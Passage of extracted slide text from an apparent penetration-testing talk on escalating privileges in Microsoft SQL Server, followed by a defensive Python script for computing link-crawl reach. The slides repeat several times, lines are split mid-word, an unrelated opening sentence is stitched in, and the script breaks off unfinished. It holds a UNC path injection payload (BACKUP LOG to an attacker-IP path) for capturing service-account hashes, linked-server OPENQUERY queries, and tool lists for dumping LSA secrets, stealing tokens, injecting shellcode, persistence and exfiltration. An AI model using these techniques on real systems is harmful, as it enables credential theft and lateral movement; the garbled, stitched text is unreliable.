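The two flagged records are the BACKUP LOG / RESTORE LOG pair from a non-backup login to an address that is not a backup server, which is the shape of the injection shown on the slide; the legitimate backup to the approved share and the local-disk backup pass through untouched.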
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands.
2. OS commands run as the SQL Server service account.
3. Service accounts have sysadmin privileges by default.
4. Companies often use a single domain account to run hundreds of SQL Servers.
5. So if you get sysadmin on one server, you have it on all of them.
One account to rule them all.
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network diagram with Internet, DMZ and Intranet zones: a web application (LVA) exposed on ports 80 and 443, SQL Servers reachable on ports 1433 and 1434, and HVA, LRA and ADS systems on the intranet. The attack path is shown in four panels: 1. SQL injection against the LVA; 2. Execute local command via xp_cmdshell; 3. Access to the HVA with the shared domain service account, then execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation.
• The Public role can use links to execute queries on remote servers (impersonation):
  SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell).
• Links can be crawled.
[Figure: Leveraging MS SQL Database links. The same network diagram (Internet, DMZ and Intranet; ports 80 and 443 to the LVA, ports 1433 and 1434 to the SQL Servers; HVA, LRA and ADS on the intranet), shown in four panels: DB1 (the LVA database) has a DB link with least privileges to one server and a DB link with the SA account to another. 1. SQL injection against the LVA; 2. Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen.
• The max number of hops we've seen is 12.
• The max number of servers crawled is 226.

Escalating Privileges: Crawling Server Links
Old script: released 2012, https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New functions: author Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/

Function: Description
• Get-SQLServerLink: Get a list of SQL Server links on the server
• Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
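The two escalation mechanics above, links that a public login can follow and shared domain service accounts that turn one sysadmin into many, compose into a blast radius that a defender can compute from inventory alone, without touching any instance. The following is an added example for this page, not code from the deck or from PowerUpSQL: a breadth-first crawl over a constructed link map and service-account list, applying the two rules the slides state (any reached server's outbound links are usable, and the privilege on the far side is whatever fixed remote login the link carries; sysadmin on a server is treated as sysadmin on every other server running the same domain service account). The server names, links and accounts are constructed; in practice they would come from sys.servers, sys.linked_logins and the service-account configuration of each instance.

```python
from collections import deque
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Link:
    source: str              # server that defines the linked server
    target: str              # remote server the link points at
    maps_to_sysadmin: bool   # True when the link's fixed remote login is sa or another sysadmin


@dataclass
class Reach:
    privilege: str   # "public" or "sysadmin"
    hops: int        # link hops plus shared-account pivots from the entry server
    via: str         # how the server was reached


# Built-in virtual accounts contain a backslash but are per machine, not shared.
_LOCAL_PREFIXES = ("NT SERVICE\\", "NT AUTHORITY\\")


def _is_domain_account(account: str) -> bool:
    return "\\" in account and not account.upper().startswith(_LOCAL_PREFIXES)


def blast_radius(entry: str, entry_is_sysadmin: bool,
                 links: List[Link], service_accounts: Dict[str, str]) -> Dict[str, Reach]:
    """Breadth-first crawl of what an attacker could reach starting on `entry`."""
    out_links: Dict[str, List[Link]] = {}
    for link in links:
        out_links.setdefault(link.source, []).append(link)
    by_account: Dict[str, List[str]] = {}
    for server, account in service_accounts.items():
        if _is_domain_account(account):
            by_account.setdefault(account, []).append(server)

    reach = {entry: Reach("sysadmin" if entry_is_sysadmin else "public", 0, "entry point")}
    queue = deque([entry])
    while queue:
        current = queue.popleft()
        here = reach[current]
        candidates = []
        # Rule 1: public is enough to use a link; privilege on the far side is the link's.
        for link in out_links.get(current, []):
            privilege = "sysadmin" if link.maps_to_sysadmin else "public"
            candidates.append((link.target, privilege, f"link from {current}"))
        # Rule 2: sysadmin means OS commands as the service account, so every
        # other server run by the same domain account is sysadmin too.
        if here.privilege == "sysadmin":
            account = service_accounts.get(current, "")
            for peer in by_account.get(account, []):
                if peer != current:
                    candidates.append((peer, "sysadmin", f"shared service account {account} (from {current})"))
        for server, privilege, via in candidates:
            known = reach.get(server)
            # Record a new server, or upgrade one previously reached only as public.
            if known is None or (privilege == "sysadmin" and known.privilege == "public"):
                reach[server] = Reach(privilege, here.hops + 1, via)
                queue.append(server)
    return reach


def sysadmin_servers(reach: Dict[str, Reach]) -> List[str]:
    return sorted(s for s, r in reach.items() if r.privilege == "sysadmin")


def max_hops(reach: Dict[str, Reach]) -> int:
    return max(r.hops for r in reach.values())


# Constructed inventory for the example.
LINKS = [
    Link("DB1", "DB2", maps_to_sysadmin=False),   # link with least privileges
    Link("DB2", "DB3", maps_to_sysadmin=True),    # link configured with the sa account
    Link("DB9", "DB4", maps_to_sysadmin=True),
    Link("DB5", "DB1", maps_to_sysadmin=True),    # points back into the crawl; DB5 itself is never reached
]
SERVICE_ACCOUNTS = {
    "DB1": "NT Service\\MSSQLSERVER",
    "DB2": "NT Service\\MSSQLSERVER",
    "DB3": "CORP\\svc_sql",
    "DB9": "CORP\\svc_sql",        # the HVA shares its domain service account with DB3
    "DB4": "CORP\\svc_sql_hva",
    "DB5": "CORP\\svc_sql_other",
}

if __name__ == "__main__":
    result = blast_radius("DB1", entry_is_sysadmin=False, links=LINKS, service_accounts=SERVICE_ACCOUNTS)
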